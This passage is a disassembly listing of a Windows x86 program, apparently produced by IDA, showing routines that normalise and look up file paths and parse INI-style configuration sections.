var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_4], 1
mov [ebp+var_8], 2
jmp short loc_492490
; ---------------------------------------------------------------------------
loc_492489: ; CODE XREF: sub_492470+5E�j
; sub_492470+7F�j ...
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_492490: ; CODE XREF: sub_492470+17�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_10]
jnb loc_492523
mov eax, ds:dword_4A2908
add eax, [ebp+var_8]
mov al, [eax+810h]
mov [ebp+var_C], al
movsx eax, [ebp+var_C]
mov ecx, ds:dword_4A2908
add ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx+810h]
cmp eax, ecx
jnz short loc_4924D0
movsx eax, [ebp+var_C]
cmp eax, 5Ch
jnz short loc_4924D0
jmp short loc_492489
; ---------------------------------------------------------------------------
loc_4924D0: ; CODE XREF: sub_492470+53�j
; sub_492470+5C�j
movsx eax, [ebp+var_C]
cmp eax, 2Fh
jnz short loc_4924F1
mov eax, ds:dword_4A2908
add eax, [ebp+var_8]
mov byte ptr [eax+810h], 5Ch
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
jmp short loc_492489
; ---------------------------------------------------------------------------
loc_4924F1: ; CODE XREF: sub_492470+67�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
jz short loc_492517
mov eax, ds:dword_4A2908
add eax, [ebp+var_4]
mov ecx, ds:dword_4A2908
add ecx, [ebp+var_8]
mov cl, [ecx+810h]
mov [eax+811h], cl
loc_492517: ; CODE XREF: sub_492470+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp loc_492489
; ---------------------------------------------------------------------------
loc_492523: ; CODE XREF: sub_492470+26�j
mov eax, ds:dword_4A2908
add eax, [ebp+var_4]
and byte ptr [eax+811h], 0
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+var_10]
sub ecx, eax
mov eax, ecx
leave
retn
sub_492470 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49253F proc near ; CODE XREF: sub_490D24+3A�p
; sub_491346+19�p ...
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_56 = byte ptr -56h
var_55 = byte ptr -55h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 004928BC SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F3D8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 50h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz short loc_492570
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_492570: ; CODE XREF: sub_49253F+29�j
cmp ds:dword_4A2908, 0
jnz short loc_492580
xor eax, eax
jmp loc_4928BE
; ---------------------------------------------------------------------------
loc_492580: ; CODE XREF: sub_49253F+38�j
and [ebp+var_1C], 0
push offset dword_4A28C8
call ds:dword_4A26C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
push 4
push offset a? ; "\\\\?\\"
push [ebp+arg_0]
call sub_48D730
add esp, 0Ch
test eax, eax
jnz short loc_4925B2
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
loc_4925B2: ; CODE XREF: sub_49253F+68�j
lea eax, [ebp+var_1C]
push eax
mov eax, ds:dword_4A2908
add eax, 810h
push eax
push 104h
push [ebp+arg_0]
call ds:dword_4A2708 ; GetFullPathNameA
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz loc_4928A5
push [ebp+var_20]
mov eax, ds:dword_4A2908
add eax, 810h
push eax
call ds:dword_4A27C8 ; CharUpperBuffA
mov ecx, [ebp+var_20]
call sub_492470
mov ecx, [ebp+var_1C]
sub ecx, eax
mov [ebp+var_1C], ecx
mov eax, ds:dword_4A2908
mov eax, [eax+0C14h]
mov [ebp+var_24], eax
mov eax, ds:dword_4A2908
mov ecx, [eax+0C14h]
mov edi, ds:dword_4A2908
add edi, 10h
mov esi, ds:dword_4A2908
add esi, 810h
xor eax, eax
repe cmpsb
jz short loc_492679
mov eax, ds:dword_4A2908
mov ecx, [eax+0C18h]
mov edi, ds:dword_4A2908
add edi, 410h
mov esi, ds:dword_4A2908
add esi, 810h
xor eax, eax
repe cmpsb
jnz loc_49281A
mov eax, ds:dword_4A2908
mov eax, [eax+0C18h]
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_49281A
loc_492679: ; CODE XREF: sub_49253F+F3�j
mov eax, [ebp+var_24]
mov ecx, ds:dword_4A2908
lea eax, [ecx+eax+810h]
mov [ebp+var_28], eax
mov edi, [ebp+var_28]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_34], ecx
mov [ebp+var_38], 1
mov eax, ds:dword_4A2908
mov eax, [eax+0Ch]
mov [ebp+var_2C], eax
and [ebp+var_30], 0
loc_4926B2: ; CODE XREF: sub_49253F:loc_492752�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_2C]
ja loc_492757
mov eax, [ebp+var_38]
add eax, [ebp+var_2C]
shr eax, 1
mov [ebp+var_44], eax
mov eax, [ebp+var_44]
dec eax
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
mov [ebp+var_3C], eax
push [ebp+var_34]
mov eax, [ebp+var_3C]
push dword ptr [eax]
push [ebp+var_28]
call sub_48D730
add esp, 0Ch
mov [ebp+var_40], eax
cmp [ebp+var_40], 0
jnz short loc_49273C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov ecx, [ebp+var_34]
movsx eax, byte ptr [eax+ecx]
test eax, eax
jz short loc_49271C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov ecx, [ebp+var_34]
movsx eax, byte ptr [eax+ecx]
cmp eax, 5Ch
jnz short loc_492733
loc_49271C: ; CODE XREF: sub_49253F+1CA�j
mov eax, [ebp+var_44]
dec eax
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
add ecx, eax
mov [ebp+var_30], ecx
jmp short loc_492757
; ---------------------------------------------------------------------------
loc_492733: ; CODE XREF: sub_49253F+1DB�j
mov eax, [ebp+var_44]
dec eax
mov [ebp+var_2C], eax
jmp short loc_492752
; ---------------------------------------------------------------------------
loc_49273C: ; CODE XREF: sub_49253F+1BA�j
cmp [ebp+var_40], 0
jle short loc_49274B
mov eax, [ebp+var_44]
inc eax
mov [ebp+var_38], eax
jmp short loc_492752
; ---------------------------------------------------------------------------
loc_49274B: ; CODE XREF: sub_49253F+201�j
mov eax, [ebp+var_44]
dec eax
mov [ebp+var_2C], eax
loc_492752: ; CODE XREF: sub_49253F+1FB�j
; sub_49253F+20A�j
jmp loc_4926B2
; ---------------------------------------------------------------------------
loc_492757: ; CODE XREF: sub_49253F+179�j
; sub_49253F+1F2�j
cmp [ebp+var_30], 0
jz loc_492815
cmp [ebp+arg_4], 0
jz short loc_49276F
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov [eax], ecx
loc_49276F: ; CODE XREF: sub_49253F+226�j
mov eax, [ebp+var_30]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_50], eax
mov eax, [ebp+var_28]
mov [ebp+var_54], eax
loc_49277F: ; CODE XREF: sub_49253F+272�j
mov eax, [ebp+var_54]
mov al, [eax]
mov [ebp+var_55], al
mov ecx, [ebp+var_50]
cmp al, [ecx]
jnz short loc_4927B9
cmp [ebp+var_55], 0
jz short loc_4927B3
mov eax, [ebp+var_54]
mov al, [eax+1]
mov [ebp+var_56], al
mov ecx, [ebp+var_50]
cmp al, [ecx+1]
jnz short loc_4927B9
add [ebp+var_54], 2
add [ebp+var_50], 2
cmp [ebp+var_56], 0
jnz short loc_49277F
loc_4927B3: ; CODE XREF: sub_49253F+253�j
and [ebp+var_5C], 0
jmp short loc_4927C1
; ---------------------------------------------------------------------------
loc_4927B9: ; CODE XREF: sub_49253F+24D�j
; sub_49253F+264�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_5C], eax
loc_4927C1: ; CODE XREF: sub_49253F+278�j
mov eax, [ebp+var_5C]
mov [ebp+var_60], eax
cmp [ebp+var_60], 0
jnz short loc_4927D5
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
jmp short loc_4927DB
; ---------------------------------------------------------------------------
loc_4927D5: ; CODE XREF: sub_49253F+28C�j
mov eax, [ebp+arg_8]
mov byte ptr [eax], 1
loc_4927DB: ; CODE XREF: sub_49253F+294�j
cmp [ebp+arg_C], 0
jz short loc_4927FA
push 0
mov eax, ds:dword_4A2908
add eax, 810h
push eax
call sub_49A2CA
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_4927FA: ; CODE XREF: sub_49253F+2A0�j
push 0FFFFFFFFh
mov eax, [ebp+var_30]
mov [ebp+var_64], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_64]
jmp loc_4928BE
; ---------------------------------------------------------------------------
loc_492815: ; CODE XREF: sub_49253F+21C�j
jmp loc_4928A5
; ---------------------------------------------------------------------------
loc_49281A: ; CODE XREF: sub_49253F+11C�j
; sub_49253F+134�j
push [ebp+var_1C]
call sub_499A16
pop ecx
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_4928A5
mov eax, ds:dword_4A2908
mov eax, [eax+8]
cmp eax, [ebp+var_48]
ja short loc_4928A5
mov eax, ds:dword_4A2908
mov eax, [eax+0Ch]
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
add ecx, eax
cmp [ebp+var_48], ecx
jnb short loc_4928A5
mov eax, [ebp+var_48]
mov [ebp+var_4C], eax
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
cmp [ebp+arg_C], 0
jz short loc_49287F
push 0
mov eax, ds:dword_4A2908
add eax, 810h
push eax
call sub_49A2CA
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_49287F: ; CODE XREF: sub_49253F+325�j
cmp [ebp+arg_4], 0
jz short loc_49288D
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4C]
mov [eax], ecx
loc_49288D: ; CODE XREF: sub_49253F+344�j
push 0FFFFFFFFh
mov eax, [ebp+var_48]
mov [ebp+var_68], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_68]
jmp short loc_4928BE
; ---------------------------------------------------------------------------
loc_4928A5: ; CODE XREF: sub_49253F+97�j
; sub_49253F:loc_492815�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_4928B0
jmp short loc_4928BC
sub_49253F endp
; =============== S U B R O U T I N E =======================================
sub_4928B0 proc near ; CODE XREF: sub_49253F+36A�p
; DATA XREF: _5:0049F3E0�o
push offset dword_4A28C8
call ds:dword_4A2754 ; RtlLeaveCriticalSection
retn
sub_4928B0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49253F
loc_4928BC: ; CODE XREF: sub_49253F+36F�j
xor eax, eax
loc_4928BE: ; CODE XREF: sub_49253F+3C�j
; sub_49253F+2D1�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 10h
; END OF FUNCTION CHUNK FOR sub_49253F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4928CF proc near ; CODE XREF: sub_49BAEB+16�p
; sub_49BB3D+97�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
and [ebp+var_C], 0
and [ebp+var_8], 0
push 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_49253F
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz loc_4929C6
movzx eax, [ebp+var_C]
test eax, eax
jnz loc_4929C6
cmp [ebp+var_8], 0
jz loc_4929C6
mov eax, [ebp+var_8]
mov edi, [eax+4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_10], ecx
mov eax, ds:dword_4A2908
mov eax, [eax+0C14h]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+1]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
cmp eax, [ebp+arg_8]
jle short loc_49294F
mov eax, [ebp+var_14]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_4929C1
; ---------------------------------------------------------------------------
loc_49294F: ; CODE XREF: sub_4928CF+73�j
mov eax, ds:dword_4A2908
mov ecx, [eax+0C14h]
mov esi, ds:dword_4A2908
add esi, 10h
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_10]
mov eax, [ebp+var_8]
mov esi, [eax+4]
mov eax, ds:dword_4A2908
mov edi, [ebp+arg_4]
add edi, [eax+0C14h]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, ds:dword_4A2908
mov eax, [eax+0C14h]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_4]
and byte ptr [ecx+eax], 0
mov eax, ds:dword_4A2908
mov eax, [eax+0C14h]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_4929C1: ; CODE XREF: sub_4928CF+7E�j
push 1
pop eax
jmp short loc_4929CE
; ---------------------------------------------------------------------------
loc_4929C6: ; CODE XREF: sub_4928CF+29�j
; sub_4928CF+35�j ...
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
xor eax, eax
loc_4929CE: ; CODE XREF: sub_4928CF+F5�j
pop edi
pop esi
leave
retn
sub_4928CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4929D2 proc near ; CODE XREF: sub_49681E+3D�p
; sub_49B1C7+29�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00492A9F SIZE 00000043 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F3E8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_34], edx
mov [ebp+var_30], ecx
push [ebp+var_34]
lea eax, [ebp+var_20]
push eax
push 0
push [ebp+var_30]
call sub_49253F
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz loc_492A9F
cmp [ebp+arg_0], 0
jz short loc_492A9F
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_30]
call sub_49A2CA
pop ecx
pop ecx
mov edx, eax
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
mov edx, edi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov [ebp+var_24], edx
and [ebp+var_4], 0
push [ebp+var_34]
lea eax, [ebp+var_20]
push eax
push 0
push [ebp+var_24]
call sub_49253F
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_492A8F
jmp short loc_492A9F
sub_4929D2 endp
; =============== S U B R O U T I N E =======================================
sub_492A8F proc near ; CODE XREF: sub_4929D2+B6�p
; DATA XREF: _5:0049F3F0�o
mov eax, [ebp-24h]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_4993DD
pop ecx
retn
sub_492A8F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4929D2
loc_492A9F: ; CODE XREF: sub_4929D2+43�j
; sub_4929D2+4D�j ...
cmp [ebp+var_1C], 0
jz short loc_492AB2
movzx eax, [ebp+var_20]
test eax, eax
jnz short loc_492AB2
mov eax, [ebp+var_1C]
jmp short loc_492AD1
; ---------------------------------------------------------------------------
loc_492AB2: ; CODE XREF: sub_4929D2+D1�j
; sub_4929D2+D9�j
cmp [ebp+var_34], 0
jz short loc_492ACF
cmp [ebp+var_1C], 0
jz short loc_492ACF
mov eax, [ebp+var_34]
mov eax, [eax]
mov [ebp+var_2C], eax
push [ebp+var_2C]
call sub_4993DD
pop ecx
loc_492ACF: ; CODE XREF: sub_4929D2+E4�j
; sub_4929D2+EA�j
xor eax, eax
loc_492AD1: ; CODE XREF: sub_4929D2+DE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_4929D2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_492AE2 proc near ; CODE XREF: sub_49681E+24�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_28], edx
mov [ebp+var_24], ecx
and [ebp+var_8], 0
cmp [ebp+var_24], 0
jz loc_492BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jz loc_492BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax]
cmp eax, 2Fh
jz loc_492BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax+1]
cmp eax, 3Ah
jz loc_492BBB
mov edi, [ebp+var_24]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_14], ecx
mov eax, ds:dword_4A2908
add eax, 10h
mov ecx, ds:dword_4A2908
mov ecx, [ecx+0C10h]
sub ecx, eax
mov [ebp+var_10], ecx
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_14]
lea eax, [eax+ecx+104h]
push eax
call sub_49935A
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
mov ecx, [ebp+var_10]
mov esi, ds:dword_4A2908
add esi, 10h
mov edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_14]
inc ecx
mov esi, [ebp+var_24]
mov edi, [ebp+var_8]
add edi, [ebp+var_10]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov [ebp+var_24], eax
loc_492BBB: ; CODE XREF: sub_492AE2+17�j
; sub_492AE2+26�j ...
push 0
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_24]
call sub_49253F
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_492C41
cmp [ebp+arg_0], 0
jz short loc_492C41
cmp [ebp+var_8], 0
jnz short loc_492BFB
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_24]
call sub_49A2CA
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_492BFB: ; CODE XREF: sub_492AE2+FC�j
mov edi, [ebp+arg_0]
mov edx, [ebp+var_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov [ebp+var_24], eax
push 0
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_8]
call sub_49253F
mov [ebp+var_4], eax
loc_492C41: ; CODE XREF: sub_492AE2+F0�j
; sub_492AE2+F6�j
cmp [ebp+var_4], 0
jz short loc_492C90
movzx eax, [ebp+var_C]
test eax, eax
jnz short loc_492C90
cmp [ebp+var_28], 0
jz short loc_492C7C
cmp [ebp+var_8], 0
jz short loc_492C63
mov eax, [ebp+var_8]
mov [ebp+var_2C], eax
jmp short loc_492C72
; ---------------------------------------------------------------------------
loc_492C63: ; CODE XREF: sub_492AE2+177�j
push 0
push [ebp+var_24]
call sub_49A2CA
pop ecx
pop ecx
mov [ebp+var_2C], eax
loc_492C72: ; CODE XREF: sub_492AE2+17F�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_2C]
mov [eax], ecx
jmp short loc_492C8B
; ---------------------------------------------------------------------------
loc_492C7C: ; CODE XREF: sub_492AE2+171�j
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
push [ebp+var_1C]
call sub_4993DD
pop ecx
loc_492C8B: ; CODE XREF: sub_492AE2+198�j
mov eax, [ebp+var_4]
jmp short loc_492CA1
; ---------------------------------------------------------------------------
loc_492C90: ; CODE XREF: sub_492AE2+163�j
; sub_492AE2+16B�j
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
push [ebp+var_20]
call sub_4993DD
pop ecx
xor eax, eax
loc_492CA1: ; CODE XREF: sub_492AE2+1AC�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_492AE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_492CA8 proc near ; CODE XREF: sub_49B7AF+A�p
; sub_49B7DD+78�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], edx
mov [ebp+var_4], ecx
push 0
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_49253F
leave
retn
sub_492CA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_492CC4 proc near ; CODE XREF: sub_49BC66+2B�p
; sub_49BD0C+42�p ...
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = byte ptr 20h
; FUNCTION CHUNK AT 004931B6 SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F3F8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 64h
push ebx
push esi
push edi
and [ebp+var_34], 0
and [ebp+var_28], 0
and [ebp+var_38], 0
and [ebp+var_20], 0
and [ebp+var_30], 0
and [ebp+var_3C], 0
and [ebp+var_24], 0
and [ebp+var_48], 0
and [ebp+var_40], 0
and [ebp+var_44], 0
and [ebp+var_4], 0
mov ecx, [ebp+arg_10]
xor eax, eax
mov edi, [ebp+arg_C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 0
lea eax, [ebp+var_2C]
push eax
push 0
push 0
push [ebp+arg_14]
call sub_491346
lea eax, [ebp+var_28]
push eax
push [ebp+var_2C]
call sub_491672
mov eax, [ebp+var_28]
inc eax
push eax
call sub_49935A
pop ecx
mov [ebp+var_64], eax
mov eax, [ebp+var_64]
mov [ebp+var_34], eax
mov ecx, [ebp+var_28]
inc ecx
xor eax, eax
mov edi, [ebp+var_34]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, [ebp+var_28]
mov ecx, [ebp+var_34]
lea eax, [ecx+eax+1]
mov [ebp+var_20], eax
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
lea eax, [ebp+var_1C]
push eax
push 0
push 0
push [ebp+var_28]
push [ebp+var_34]
push [ebp+var_2C]
call sub_492177
mov eax, [ebp+var_20]
mov byte ptr [eax-1], 0Ah
jmp short loc_492DAD
; ---------------------------------------------------------------------------
loc_492DA6: ; CODE XREF: sub_492CC4:loc_493184�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
loc_492DAD: ; CODE XREF: sub_492CC4+E0�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jz loc_493189
loc_492DB9: ; CODE XREF: sub_492CC4+486�j
; sub_492CC4+4BB�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 3Bh
jnz short loc_492DF8
loc_492DC4: ; CODE XREF: sub_492CC4+125�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jz short loc_492DEB
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_492DEB
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_492DEB
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_492DC4
; ---------------------------------------------------------------------------
loc_492DEB: ; CODE XREF: sub_492CC4+106�j
; sub_492CC4+111�j ...
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jnz short loc_492DF8
jmp loc_493189
; ---------------------------------------------------------------------------
loc_492DF8: ; CODE XREF: sub_492CC4+FE�j
; sub_492CC4+12D�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 5Bh
jnz short loc_492E16
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_30], eax
mov [ebp+var_24], 1
jmp loc_493184
; ---------------------------------------------------------------------------
loc_492E16: ; CODE XREF: sub_492CC4+13D�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 5Dh
jnz loc_492EBF
loc_492E25: ; CODE XREF: sub_492CC4+217�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
cmp [ebp+var_24], 1
jnz loc_492EBA
and [ebp+var_24], 0
cmp [ebp+arg_0], 0
jnz short loc_492EA0
mov eax, [ebp+var_44]
mov [ebp+var_4C], eax
mov edi, [ebp+var_30]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_54], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_4C]
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jle short loc_492E9E
push [ebp+var_50]
push [ebp+var_30]
mov eax, [ebp+arg_C]
add eax, [ebp+var_4C]
push eax
call sub_48D770
add esp, 0Ch
mov eax, [ebp+var_50]
cmp eax, [ebp+var_54]
jle short loc_492E8B
mov eax, [ebp+var_54]
mov [ebp+var_74], eax
jmp short loc_492E91
; ---------------------------------------------------------------------------
loc_492E8B: ; CODE XREF: sub_492CC4+1BD�j
mov eax, [ebp+var_50]
mov [ebp+var_74], eax
loc_492E91: ; CODE XREF: sub_492CC4+1C5�j
mov eax, [ebp+var_74]
mov ecx, [ebp+var_4C]
lea eax, [ecx+eax+1]
mov [ebp+var_44], eax
loc_492E9E: ; CODE XREF: sub_492CC4+1A0�j
jmp short loc_492EBA
; ---------------------------------------------------------------------------
loc_492EA0: ; CODE XREF: sub_492CC4+179�j
push [ebp+var_30]
push [ebp+arg_0]
call ds:dword_4A27C0 ; lstrcmpi
test eax, eax
jnz short loc_492EB6
mov [ebp+var_48], 1
jmp short loc_492EBA
; ---------------------------------------------------------------------------
loc_492EB6: ; CODE XREF: sub_492CC4+1EA�j
and [ebp+var_48], 0
loc_492EBA: ; CODE XREF: sub_492CC4+16B�j
; sub_492CC4:loc_492E9E�j ...
jmp loc_493184
; ---------------------------------------------------------------------------
loc_492EBF: ; CODE XREF: sub_492CC4+15B�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_492ED5
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_492EEC
